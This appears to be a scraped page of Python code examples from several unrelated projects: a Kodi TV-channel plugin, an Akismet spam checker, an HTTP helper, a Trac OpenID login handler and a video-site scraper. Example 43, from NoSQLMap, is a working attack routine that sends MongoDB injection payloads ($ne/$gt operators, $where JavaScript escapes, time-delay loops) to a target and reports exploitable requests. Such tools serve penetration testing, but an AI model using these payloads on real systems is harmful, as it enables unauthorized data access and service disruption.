			addStream("yanbianfm", "延边卫视FM")
		
		xbmcplugin.endOfDirectory(addon_handle)

	elif param.startswith("?category="):
		category = param[10:]
		
		def addStream(channelID, channelName):
			li = xbmcgui.ListItem(channelName, iconImage=addon_path + "/resources/media/" + channelID + ".png")
			xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?stream=" + channelID, listitem=li)
		
		if category == "yangshi":
			addStream("cctv1", "CCTV-1 综合")
			addStream("cctv2", "CCTV-2 财经")
			addStream("cctv3", "CCTV-3 综艺")
			addStream("cctv4", "CCTV-4 (亚洲)")
			addStream("cctveurope", "CCTV-4 (欧洲)")
			addStream("cctvamerica", "CCTV-4 (美洲)")
			addStream("cctv5", "CCTV-5 体育")
			addStream("cctv6", "CCTV-6 电影")
			addStream("cctv7", "CCTV-7 军事 农业")
			addStream("cctv8", "CCTV-8 电视剧")
			addStream("cctvjilu", "CCTV-9 纪录")
			addStream("cctvdoc", "CCTV-9 纪录(英)")
			addStream("cctv10", "CCTV-10 科教")
			addStream("cctv11", "CCTV-11 戏曲")
			addStream("cctv12", "CCTV-12 社会与法")
			addStream("cctv13", "CCTV-13 新闻")
			addStream("cctvchild", "CCTV-14 少儿")
			addStream("cctv15", "CCTV-15 音乐")
			addStream("cctv9", "CCTV-NEWS")
			addStream("cctv5plus", "CCTV体育赛事")
		if category == "weishi":
			addStream("anhui", "安徽卫视")
			addStream("btv1", "北京卫视")
			addStream("bingtuan", "兵团卫视")
			addStream("chongqing", "重庆卫视")
			addStream("dongfang", "东方卫视")
			addStream("dongnan", "东南卫视")
			addStream("gansu", "甘肃卫视")
			addStream("guangdong", "广东卫视")
			addStream("guangxi", "广西卫视")
			addStream("guizhou", "贵州卫视")
			addStream("hebei", "河北卫视")
			addStream("henan", "河南卫视")
			addStream("heilongjiang", "黑龙江卫视")
			addStream("hubei", "湖北卫视")
			addStream("jilin", "吉林卫视")
			addStream("jiangxi", "江西卫视")
			addStream("kangba", "康巴卫视")
			addStream("liaoning", "辽宁卫视")
			addStream("travel", "旅游卫视")
			addStream("neimenggu", "内蒙古卫视")
			addStream("ningxia", "宁夏卫视")
			addStream("qinghai", "青海卫视")
			addStream("shandong", "山东卫视")
			addStream("sdetv", "山东教育台")
			addStream("shenzhen", "深圳卫视")
			addStream("shan1xi", "山西卫视")
			addStream("shan3xi", "陕西卫视")
			addStream("shenzhen", "深圳卫视")
			addStream("sichuan", "四川卫视")
			addStream("tianjin", "天津卫视")
			addStream("xizang", "西藏卫视")
			addStream("xiamen", "厦门卫视")
			addStream("xianggangweishi", "香港卫视")
			addStream("xinjiang", "新疆卫视")
			addStream("yanbian", "延边卫视")
			addStream("yunnan", "云南卫视")
			addStream("zhejiang", "浙江卫视")
		
		if category == "shuzi":
			addStream("zhongxuesheng", "CCTV中学生")
			addStream("xinkedongman", "CCTV新科动漫")
			addStream("zhinan", "CCTV电视指南")
		
		if category == "chengshi":
			def addCity(cityID, cityName):
				li = xbmcgui.ListItem(cityName, iconImage=addon_path + "/resources/media/" + cityID + ".png")
				xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?city=" + cityID, listitem=li, isFolder=True)
			
			addCity("anhui", "Anhui 安徽")
			addCity("beijing", "Beijing 北京")
			addCity("fujian", "Fujian 福建")
			addCity("gansu", "Gansu 甘肃")
			addCity("guangdong", "Guangdong 广东")
			addCity("guangxi", "Guangxi 广西")
			addCity("hebei", "Hebei 河北")
			addCity("heilongjiang", "Heilongjiang 黑龙江")
			addCity("hubei", "Hubei 湖北")
			addCity("jilin", "Jilin 吉林")
			addCity("jiangsu", "Jiangsu 江苏")
			addCity("jiangxi", "Jiangxi 江西")
			addCity("liaoning", "Liaoning 辽宁")
			addCity("neimenggu", "Inner Mongolia 内蒙古")
			addCity("shandong", "Shandong 山东")
			addCity("shaanxi", "Shaanxi 陕西")
			addCity("shanghai", "Shanghai 上海")
			addCity("sichuan", "Sichuan 四川")
			addCity("tianjin", "Tianjin 天津")
			addCity("xizang", "Tibet 西藏")
			addCity("xinjiang", "Xinjiang 新疆")
			addCity("yunnan", "Yunnan 云南")
			addCity("zhejiang", "Zhejiang 浙江")
		
		xbmcplugin.endOfDirectory(addon_handle)
		
	else:
		def addCategory(categoryID, categoryName):
				li = xbmcgui.ListItem(categoryName)
				xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?category=" + categoryID, listitem=li, isFolder=True)
		
		addCategory("yangshi", "National Channels 央视频道")
		addCategory("weishi", "Provincial Channels 卫视频道")
		addCategory("shuzi", "Digital Channels 数字频道")
		addCategory("chengshi", "City-based Channels 城市频道")
		
		xbmcplugin.endOfDirectory(addon_handle)

Example 43

Project: NoSQLMap
Source File: nsmweb.py
View license
def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
    print "Web App Attacks (POST)"
    print "==============="
    paramName = []
    paramValue = []
    global vulnAddrs
    global httpMethod
    httpMethod = "POST"
    vulnAddrs = []
    global possAddrs
    possAddrs = []
    timeVulnsStr = []
    timeVulnsInt = []
    appUp = False
    strTbAttack = False
    intTbAttack = False
    trueStr = False
    trueInt = False
    global neDict
    global gtDict
    testNum = 1

    #Verify app is working.
    print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."

    if https == "OFF":
        appURL = "http://" + str(victim) + ":" + str(webPort) + str(uri)

    elif https == "ON":
        appURL = "https://" + str(victim) + ":" + str(webPort) + str(uri)

    try:
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        appRespCode = urllib2.urlopen(req).getcode()

        if appRespCode == 200:

            normLength = int(len(urllib2.urlopen(req).read()))
            timeReq = urllib2.urlopen(req)
            start = time.time()
            page = timeReq.read()
            end = time.time()
            timeReq.close()
            timeBase = round((end - start), 3)

            if verb == "ON":
                print "App is up! Got response length of " + str(normLength) + " and response time of " + str(timeBase) + " seconds.  Starting injection test.\n"

            else:
                print "App is up!"
            appUp = True
        else:
            print "Got " + str(appRespCode) + "from the app, check your options."

    except Exception,e:
        print e
        print "Looks like the server didn't respond.  Check your options."

    if appUp == True:

        menuItem = 1
        print "List of parameters:"
        for params in postData.keys():
            print str(menuItem) + "-" + params
            menuItem += 1

        try:
            injIndex = raw_input("Which parameter should we inject? ")
            injOpt = str(postData.keys()[int(injIndex)-1])
            print "Injecting the " + injOpt + " parameter..."
        except:
            raw_input("Something went wrong.  Press enter to return to the main menu...")
            return

        injectSize = raw_input("Baseline test-Enter random string size: ")
        injectString = randInjString(int(injectSize))
        print "Using " + injectString + " for injection testing.\n"

        #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
        #Add error handling for Non-200 HTTP response codes if random strings freak out the app.
        postData.update({injOpt:injectString})
        if verb == "ON":
            print "Checking random injected parameter HTTP response size sending " + str(postData) +"...\n"

        else:
            print "Sending random parameter value..."

        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        randLength = int(len(urllib2.urlopen(req).read()))
        print "Got response length of " + str(randLength) + "."

        randNormDelta = abs(normLength - randLength)

        if randNormDelta == 0:
            print "No change in response size injecting a random parameter..\n"
        else:
            print "Random value variance: " + str(randNormDelta) + "\n"

        #Generate not equals injection
        neDict = postData
        neDict[injOpt + "[$ne]"] = neDict[injOpt]
        del neDict[injOpt]
        body = urllib.urlencode(neDict)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo PHP not equals associative array injection using " + str(postData) +"..."

        else:
            print "Test 1: PHP/ExpressJS != associative array injection"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum +=1
        print "\n"

        #Delete the extra key
        del postData[injOpt + "[$ne]"]

        #generate $gt injection
        gtDict = postData
        gtDict.update({injOpt:""})
        gtDict[injOpt + "[$gt]"] = gtDict[injOpt]
        del gtDict[injOpt]
        body = urllib.urlencode(gtDict)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing PHP/ExpressJS >Undefined Injection using " + str(postData) + "..."

        else:
            print "Test 2:  PHP/ExpressJS > Undefined Injection"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        postData.update({injOpt:"a'; return db.a.find(); var dummy='!"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where all Javascript string escape attack for all records...\n"
            print "Injecting " + str(postData)

        else:
            print "Test 3: $where injection (string escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1
        else:
            testNum += 1

        print "\n"

        postData.update({injOpt:"1; return db.a.find(); var dummy=1"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where Javascript integer escape attack for all records...\n"
            print "Injecting " + str(postData)
        else:
            print "Test 4: $where injection (integer escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1
        else:
            testNum += 1
        print "\n"

        #Start a single record attack in case the app expects only one record back
        postData.update({injOpt:"a'; return db.a.findOne(); var dummy='!"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n"
            print " Injecting " + str(postData)

        else:
            print "Test 5: $where injection string escape (single record)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum += 1
        print "\n"

        postData.update({injOpt:"1; return db.a.findOne(); var dummy=1"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where Javascript integer escape attack for one record...\n"
            print " Injecting " + str(postData)

        else:
            print "Test 6: $where injection integer escape (single record)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum += 1
        print "\n"

        postData.update({injOpt:"a'; return this.a != '" + injectString + "'; var dummy='!"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)

        if verb == "ON":
            print "Testing Mongo this not equals string escape attack for all records..."
            print " Injecting " + str(postData)

        else:
            print "Test 7: This != injection (string escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1
            print "\n"
        else:
            testNum += 1

        postData.update({injOpt:"1; return this.a != '" + injectString + "'; var dummy=1"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)

        if verb == "ON":
            print "Testing Mongo this not equals integer escape attack for all records..."
            print " Injecting " + str(postData)
        else:
            print "Test 8:  This != injection (integer escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum += 1
        print "\n"

        doTimeAttack = raw_input("Start timing based tests (y/n)? ")

        if doTimeAttack == "y" or doTimeAttack == "Y":
            print "Starting Javascript string escape time based injection..."
            postData.update({injOpt:"a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(curDate.getTime()-date.getTime()))/1000 < 10); return true; var dummy='a"})
            body = urllib.urlencode(postData)
            conn = urllib2.urlopen(req,body)
            start = time.time()
            page = conn.read()
            end = time.time()
            conn.close()
            print str(end)
            print str(start)
            strTimeDelta = (int(round((end - start), 3)) - timeBase)
            #print str(strTimeDelta)
            if strTimeDelta > 25:
                print "HTTP load time variance was " + str(strTimeDelta) +"  seconds! Injection possible."
                strTbAttack = True

            else:
                print "HTTP load time variance was only " + str(strTimeDelta) + " seconds.  Injection probably didn't work."
                strTbAttack = False

            print "Starting Javascript integer escape time based injection..."

            postData.update({injOpt:"1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1"})
            body = urllib.urlencode(postData)
            start = time.time()
            conn = urllib2.urlopen(req,body)
            page = conn.read()
            end = time.time()
            conn.close()
            print str(end)
            print str(start)
            intTimeDelta = ((end-start) - timeBase)
            #print str(strTimeDelta)
            if intTimeDelta > 25:
                print "HTTP load time variance was " + str(intTimeDelta) +" seconds! Injection possible."
                intTbAttack = True

            else:
                print "HTTP load time variance was only " + str(intTimeDelta) + " seconds.  Injection probably didn't work."
                intTbAttack = False

        print "\n"
        print "Exploitable requests:"
        print "\n".join(vulnAddrs)
        print "\n"
        print "Possibly vulnerable requests:"
        print"\n".join(possAddrs)
        print "\n"
        print "Timing based attacks:"

        if strTbAttack == True:
            print "String attack-Successful"
        else:
            print "String attack-Unsuccessful"
        if intTbAttack == True:
            print "Integer attack-Successful"
        else:
            print "Integer attack-Unsuccessful"

        fileOut = raw_input("Save results to file (y/n)? ")

        if fileOut.lower() == "y":
            savePath = raw_input("Enter output file name: ")
            fo = open(savePath, "wb")
            fo.write ("Vulnerable Requests:\n")
            fo.write("\n".join(vulnAddrs))
            fo.write("\n\n")
            fo.write("Possibly Vulnerable Requests:\n")
            fo.write("\n".join(possAddrs))
            fo.write("\n")
            fo.write("Timing based attacks:\n")

            if strTbAttack == True:
                fo.write("String Attack-Successful\n")
            else:
                fo.write("String Attack-Unsuccessful\n")
            fo.write("\n")

            if intTbAttack == True:
                fo.write("Integer attack-Successful\n")
            else:
                fo.write("Integer attack-Unsuccessful\n")
            fo.write("\n")
            fo.close()

    raw_input("Press enter to continue...")
    return()

Example 44

Project: tendenci
Source File: akismet.py
View license
    def comment_check(self, comment, data=None, build_data=True, DEBUG=False):
        """
        This is the function that checks comments.
        
        It returns ``True`` for spam and ``False`` for ham.
        
        If you set ``DEBUG=True`` then it will return the text of the response,
        instead of the ``True`` or ``False`` object.
        
        It raises ``APIKeyError`` if you have not yet set an API key.
        
        If the connection to Akismet fails then the ``HTTPError`` or
        ``URLError`` will be propogated.
        
        As a minimum it requires the body of the comment. This is the
        ``comment`` argument.
        
        Akismet requires some other arguments, and allows some optional ones.
        The more information you give it, the more likely it is to be able to
        make an accurate diagnosise.
        
        You supply these values using a mapping object (dictionary) as the
        ``data`` argument.
        
        If ``build_data`` is ``True`` (the default), then *akismet.py* will
        attempt to fill in as much information as possible, using default
        values where necessary. This is particularly useful for programs
        running in a {acro;CGI} environment. A lot of useful information
        can be supplied from evironment variables (``os.environ``). See below.
        
        You *only* need supply values for which you don't want defaults filled
        in for. All values must be strings.
        
        There are a few required values. If they are not supplied, and
        defaults can't be worked out, then an ``AkismetError`` is raised.
        
        If you set ``build_data=False`` and a required value is missing an
        ``AkismetError`` will also be raised.
        
        The normal values (and defaults) are as follows : ::
        
            'user_ip':          os.environ['REMOTE_ADDR']       (*)
            'user_agent':       os.environ['HTTP_USER_AGENT']   (*)
            'referrer':         os.environ.get('HTTP_REFERER', 'unknown') [#]_
            'permalink':        ''
            'comment_type':     'comment' [#]_
            'comment_author':   ''
            'comment_author_email': ''
            'comment_author_url': ''
            'SERVER_ADDR':      os.environ.get('SERVER_ADDR', '')
            'SERVER_ADMIN':     os.environ.get('SERVER_ADMIN', '')
            'SERVER_NAME':      os.environ.get('SERVER_NAME', '')
            'SERVER_PORT':      os.environ.get('SERVER_PORT', '')
            'SERVER_SIGNATURE': os.environ.get('SERVER_SIGNATURE', '')
            'SERVER_SOFTWARE':  os.environ.get('SERVER_SOFTWARE', '')
            'HTTP_ACCEPT':      os.environ.get('HTTP_ACCEPT', '')
        
        (*) Required values
        
        You may supply as many additional 'HTTP_*' type values as you wish.
        These should correspond to the http headers sent with the request.
        
        .. [#] Note the spelling "referrer". This is a required value by the
            akismet api - however, referrer information is not always
            supplied by the browser or server. In fact the HTTP protocol
            forbids relying on referrer information for functionality in 
            programs.
        .. [#] The `API docs <http://akismet.com/development/api/>`_ state that this value
            can be " *blank, comment, trackback, pingback, or a made up value*
            *like 'registration'* ".
        """
        if self.key is None:
            raise APIKeyError("Your have not set an API key.")
        if data is None:
            data = {}
        if build_data:
            self._build_data(comment, data)
        if 'blog' not in data:
            data['blog'] = self.blog_url
        url = '%scomment-check' % self._getURL()
        # we *don't* trap the error here
        # so if akismet is down it will raise an HTTPError or URLError
        headers = {'User-Agent' : self.user_agent}
        resp = self._safeRequest(url, urlencode(data), headers)
        if DEBUG:
            return resp
        resp = resp.lower()
        if resp == 'true':
            return True
        elif resp == 'false':
            return False
        else:
            # NOTE: Happens when you get a 'howdy wilbur' response !
            raise AkismetError('missing required argument.')

Example 45

Project: traktforalfred
Source File: web.py
View license
def request(method, url, params=None, data=None, headers=None, cookies=None,
            files=None, auth=None, timeout=60, allow_redirects=False):
    """Initiate an HTTP(S) request. Returns :class:`Response` object.

    :param method: 'GET' or 'POST'
    :type method: ``unicode``
    :param url: URL to open
    :type url: ``unicode``
    :param params: mapping of URL parameters
    :type params: :class:`dict`
    :param data: mapping of form data ``{'field_name': 'value'}`` or
        :class:`str`
    :type data: :class:`dict` or :class:`str`
    :param headers: HTTP headers
    :type headers: :class:`dict`
    :param cookies: cookies to send to server
    :type cookies: :class:`dict`
    :param files: files to upload (see below).
    :type files: :class:`dict`
    :param auth: username, password
    :type auth: ``tuple``
    :param timeout: connection timeout limit in seconds
    :type timeout: ``int``
    :param allow_redirects: follow redirections
    :type allow_redirects: ``Boolean``
    :returns: :class:`Response` object


    The ``files`` argument is a dictionary::

        {'fieldname' : { 'filename': 'blah.txt',
                         'content': '<binary data>',
                         'mimetype': 'text/plain'}
        }

    * ``fieldname`` is the name of the field in the HTML form.
    * ``mimetype`` is optional. If not provided, :mod:`mimetypes` will
      be used to guess the mimetype, or ``application/octet-stream``
      will be used.

    """

    # TODO: cookies
    # TODO: any way to force GET or POST?
    socket.setdefaulttimeout(timeout)

    # Default handlers
    openers = []

    if not allow_redirects:
        openers.append(NoRedirectHandler())

    if auth is not None:  # Add authorisation handler
        username, password = auth
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, url, username, password)
        auth_manager = urllib2.HTTPBasicAuthHandler(password_manager)
        openers.append(auth_manager)

    # Install our custom chain of openers
    opener = urllib2.build_opener(*openers)
    urllib2.install_opener(opener)

    if not headers:
        headers = CaseInsensitiveDictionary()
    else:
        headers = CaseInsensitiveDictionary(headers)

    if 'user-agent' not in headers:
        headers['user-agent'] = USER_AGENT

    # Accept gzip-encoded content
    encodings = [s.strip() for s in
                 headers.get('accept-encoding', '').split(',')]
    if 'gzip' not in encodings:
        encodings.append('gzip')

    headers['accept-encoding'] = ', '.join(encodings)

    if files:
        if not data:
            data = {}
        new_headers, data = encode_multipart_formdata(data, files)
        headers.update(new_headers)
    elif data and isinstance(data, dict):
        data = urllib.urlencode(str_dict(data))

    # Make sure everything is encoded text
    headers = str_dict(headers)

    if isinstance(url, unicode):
        url = url.encode('utf-8')

    if params:  # GET args (POST args are handled in encode_multipart_formdata)

        scheme, netloc, path, query, fragment = urlparse.urlsplit(url)

        if query:  # Combine query string and `params`
            url_params = urlparse.parse_qs(query)
            # `params` take precedence over URL query string
            url_params.update(params)
            params = url_params

        query = urllib.urlencode(str_dict(params), doseq=True)
        url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))

    req = urllib2.Request(url, data, headers)
    return Response(req)

Example 46

Project: authopenid-plugin
Source File: authopenid.py
View license
    def _do_process(self, req):
        """Handle the redirect from the OpenID server.
        """
        db = self.env.get_db_cnx()
        oidconsumer, oidsession = self._get_consumer(req, db)

        # Ask the library to check the response that the server sent
        # us.  Status is a code indicating the response type. info is
        # either None or a string containing more information about
        # the return type.
        current_url = req.abs_href(req.path_info)
        info = oidconsumer.complete(req.args,current_url)

        css_class = 'error'
        if info.status == consumer.FAILURE and info.identity_url:
            # In the case of failure, if info is non-None, it is the
            # URL that we were verifying. We include it in the error
            # message to help the user figure out what happened.
            fmt = "Verification of %s failed: %s"
            message = fmt % (cgi.escape(info.identity_url),
                             info.message)
        elif info.status == consumer.SUCCESS:
            # Success means that the transaction completed without
            # error. If info is None, it means that the user cancelled
            # the verification.
            css_class = 'alert'

            session_attr = {}           # attributes for new "user"

            # This is a successful verification attempt. If this
            # was a real application, we would do our login,
            # comment posting, etc. here.
            fmt = "You have successfully verified %s as your identity."
            message = fmt % (cgi.escape(info.identity_url),)
            remote_user = info.identity_url

            sreg_info = sreg.SRegResponse.fromSuccessResponse(info) or {}

            ax_response = ax.FetchResponse.fromSuccessResponse(info)
            ax_info = {}
            if ax_response:
                for alias, uri in self.openid_ax_attrs.items():
                    values = ax_response.data.get(uri,[])
                    if values:
                        ax_info[alias] = values[0]

            email = (ax_info.get('email')
                     or ax_info.get('email2')
                     or sreg_info.get('email'))

            fullname = (
                ' '.join(filter(None, map(ax_info.get,
                                          ('firstname', 'lastname'))))
                or sreg_info.get('fullname')
                or (email and email.split('@',1)[0].replace('.', ' ').title()))

            nickname = sreg_info.get('nickname')

            if self.groups_to_request and TeamsResponse:
                teams_response = TeamsResponse.fromSuccessResponse(info)
                if teams_response:
                    # be careful not to make user a member of any trac groups
                    # not named in groups_to_request
                    teams = set(teams_response.teams
                                ).intersection(self.groups_to_request)
                    if teams:
                        session_attr['openid.teams'] = ','.join(teams)

            if self.strip_protocol:
                remote_user = remote_user[remote_user.find('://')+3:]
            if self.strip_trailing_slash and remote_user[-1] == '/':
                remote_user = remote_user[:-1]
            if info.endpoint.canonicalID:
                # You should authorize i-name users by their canonicalID,
                # rather than their more human-friendly identifiers.  That
                # way their account with you is not compromised if their
                # i-name registration expires and is bought by someone else.
                message += ("  This is an i-name, and its persistent ID is %s"
                            % (cgi.escape(info.endpoint.canonicalID),))
                remote_user = info.endpoint.canonicalID

            allowed = True
            if self.re_white_list:
                self.env.log.debug("Filtering REMOTE_USER '%s' through white-list." % remote_user)
                allowed = False
                for item in self.re_white_list:
                    if not allowed and item.match(remote_user):
                        allowed = True
                        self.env.log.debug("User white-listed.")
            if allowed and self.re_black_list:
                self.env.log.debug("Filtering REMOTE_USER '%s' through black-list." % remote_user)
                for item in self.re_black_list:
                    if item.match(remote_user):
                        allowed = False
                        self.env.log.debug("User black-listed.")
            if allowed and self.re_email_white_list:
                self.env.log.debug("Filtering email %r through email white-list." % email)
                allowed = False
                if email:
                    for item in self.re_email_white_list:
                        if not allowed and item.match(email):
                            allowed = True
                            self.env.log.debug("User email white-listed.")

            if allowed and self.check_list:
                allowed = False
                params = {self.check_list_key: remote_user}
                if email:
                    params['email'] = email
                url = self.check_list + '?' + urllib.urlencode(params)
                self.env.log.debug('OpenID check list URL: %s' % url)
                try:
                    result = json.load(urllib.urlopen(url))
                    if result[self.check_list_key]:
                        if self.check_list_username:
                            cl_username = unicode(
                                result[self.check_list_username])
                            if not cl_username:
                                raise ValueError("Bad value for username")
                        allowed = True
                except Exception, ex:
                    self.env.log.error('OpenID check_list failed: %s' % ex)

            if allowed:
                cookie = hex_entropy()
                cookie_lifetime = self.trac_auth_cookie_lifetime

                req.outcookie['trac_auth'] = cookie
                req.outcookie['trac_auth']['path'] = req.href()
                if cookie_lifetime > 0:
                    req.outcookie['trac_auth']['expires'] = cookie_lifetime

                session_attr[self.openid_session_identity_url_key] = info.identity_url
                if email:
                    session_attr['email'] = email
                if fullname:
                    session_attr['name'] = fullname

                self._commit_oidsession(oidsession, req)

                # First look for an existing authenticated session with
                # matching identity_url.
                self.env.log.debug('Checking URL: %s' % info.identity_url)
                authname_for_identity_url = self.get_user(info.identity_url)
                if authname_for_identity_url:
                    authname = authname_for_identity_url
                    ds = DetachedSession(self.env, authname)
                    # The user already exists, update team membership
                    # XXX: Should also update name and/or email? (This would
                    # be an API change.)
                    for name in ['openid.teams']:
                        if name in session_attr:
                            ds[name] = session_attr[name]
                        elif name in ds:
                            del ds[name]
                    ds.save()
                else:
                    # New identity URL -> create new authname/user.
                    if self.check_list and self.check_list_username:
                        authname = cl_username
                    elif self.use_nickname_as_authname and nickname:
                        authname = nickname
                    elif session_attr.get('name'):
                        authname = session_attr['name']
                        if self.combined_username:
                            authname = '%s <%s>' % (authname, remote_user)
                    else:
                        authname = remote_user

                    # Possibly lower-case the authname.
                    if self.lowercase_authname:
                        authname = authname.lower()

                    if self.trust_authname:
                        ds = DetachedSession(self.env, authname)
                    else:
                        # Make authname unique in case of collisions
                        def authnames(base):
                            yield base
                            for attempt in itertools.count(2):
                                yield "%s (%d)" % (base, attempt)

                        users_and_groups_with_permissions = set(
                            user
                            for user, perm
                            in PermissionSystem(self.env).get_all_permissions())

                        for authname in authnames(authname):
                            ds = DetachedSession(self.env, authname)
                            # At least in 0.12.2, this means no session exists.
                            no_session_exists = ds.last_visit == 0 and len(ds) == 0
                            no_permissions_defined = authname not in users_and_groups_with_permissions
                            if (no_session_exists and no_permissions_defined):
                                # name is free :-)
                                break
                        # Set attributes for new user on the
                        # current anonymous session.  It will be promoted to
                        # the new authenticated session on the next request
                        # (by Session.__init__).
                        #
                        # NB: avoid dict.update here to ensure that
                        # DetachedSession.__getitem__ gets a chance to
                        # normalize values
                        for name, value in session_attr.items():
                            req.session[name] = value
                        self.env.log.info("Created new user '%s' for "
                            "OpenID identifier %s", authname, info.identity_url)

                req.authname = authname

                db = self.env.get_db_cnx()
                cursor = db.cursor()
                cursor.execute("INSERT INTO auth_cookie (cookie,name,ipnr,time) "
                               "VALUES (%s, %s, %s, %s)", (cookie, authname,
                               self._get_masked_address(req.remote_addr), int(time.time())))
                db.commit()

                req.redirect(req.session.get('oid.referer') or self.env.abs_href())
            else:
                message = 'You are not allowed here.'
        elif info.status == consumer.CANCEL:
            # cancelled
            message = 'Verification cancelled'
        elif info.status == consumer.SETUP_NEEDED:
            if info.setup_url:
                message = '<a href=%s>Setup needed</a>' % (
                    quoteattr(info.setup_url),)
            else:
                # This means auth didn't succeed, but you're welcome to try
                # non-immediate mode.
                message = 'Setup needed'
        else:
            # Either we don't understand the code or there is no
            # openid_url included with the error. Give a generic
            # failure message. The library should supply debug
            # information in a log.
            message = 'Verification failed.'

        self._commit_oidsession(oidsession, req)

        add_stylesheet(req, 'authopenid/css/openid.css')
        add_script(req, 'authopenid/js/openid-jquery.js')
        return 'openidlogin.html', {
            'images': req.href.chrome('authopenid/images') + '/',
            'action': req.href.openidverify(),
            'message': message,
            'signup': self.signup_link,
            'whatis': self.whatis_link,
            'css_class': css_class,
            'providers_regexp': self.providers_regexp,
            'custom_provider_name': self.custom_provider_name,
            'custom_provider_label': self.custom_provider_label,
            'custom_provider_url': self.custom_provider_url,
            'custom_provider_image': self.custom_provider_image,
            'custom_provider_size': self.custom_provider_size,
            }, None

Example 47

Project: pelisalacarta
Source File: newpct.py
View license
def listado(item):
    logger.info("[newpct.py] listado")
    itemlist = []   
    data = scrapertools.cache_page(item.url)
    
    '''
    <li>
    <a href='http://www.newpct.com/descargar-pelicula/la-pequena-venecia/'>
    <div class='boxgrid captionb'>
    <img src='http://images.newpct.com/banco_de_imagenes/destacados/038707/la-pequeña-venecia--dvdrip--ac3-5-1-español-castellano--2012-.jpg'  alt='Descargar Peliculas Castellano &raquo; Películas RIP La Pequeña Venecia [DVDrip][AC3 5.1 Español Castellano][2012]' />
    <div class='cover boxcaption'>
    <h3>La Pequeña Venecia </h3>
    <p>Peliculas Castellano<br/>
    Calidad: DVDRIP AC3 5.1<br>
    Tama&ntilde;o: 1.1 GB<br>
    Idioma : Español Castellano
    </p>
    </div>
    </div>
    </a>
    <div id='bot-desc'>
    <div id='tinfo'>
    <a class='youtube' href='#' rel='gx9EKDC0UFQ' title='Ver Trailer' alt='Ver Trailer'>
    <img style='width:25px;' src='http://www.newpct.com/images.inc/images/playm2.gif'></a>
    </div>
    <div id='tdescargar' ><a class='atdescargar' href='http://www.newpct.com/descargar-pelicula/la-pequena-venecia/'>DESCARGAR</a></div>
    </div>
    </li>
    '''
    patron  = "<li[^<]+"
    patron += "<a href='([^']+)'[^<]+"
    patron += "<div class='boxgrid captionb'[^<]+"
    patron += "<img src='([^']+)'[^<]+"
    patron += "<div class='cover boxcaption'[^<]+"
    patron += '<h3>([^<]+)</h3>(.*?)</div>'
    
    matches = re.compile(patron,re.DOTALL).findall(data)    

    for scrapedurl,scrapedthumbnail,scrapedtitle,scrapedplot in matches:
        title = scrapedtitle.strip()
        title = unicode( title, "iso-8859-1" , errors="replace" ).encode("utf-8")

        url = urlparse.urljoin(item.url,scrapedurl)
        thumbnail = urlparse.urljoin(item.url,scrapedthumbnail)
        plot = scrapertools.htmlclean(scrapedplot).strip()
        plot = unicode( plot, "iso-8859-1" , errors="replace" ).encode("utf-8")

        if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]")
        if item.category == "serie":
            itemlist.append( Item(channel=item.channel, action="episodios" , title=title , url=url, thumbnail=thumbnail, plot=plot))
        else:
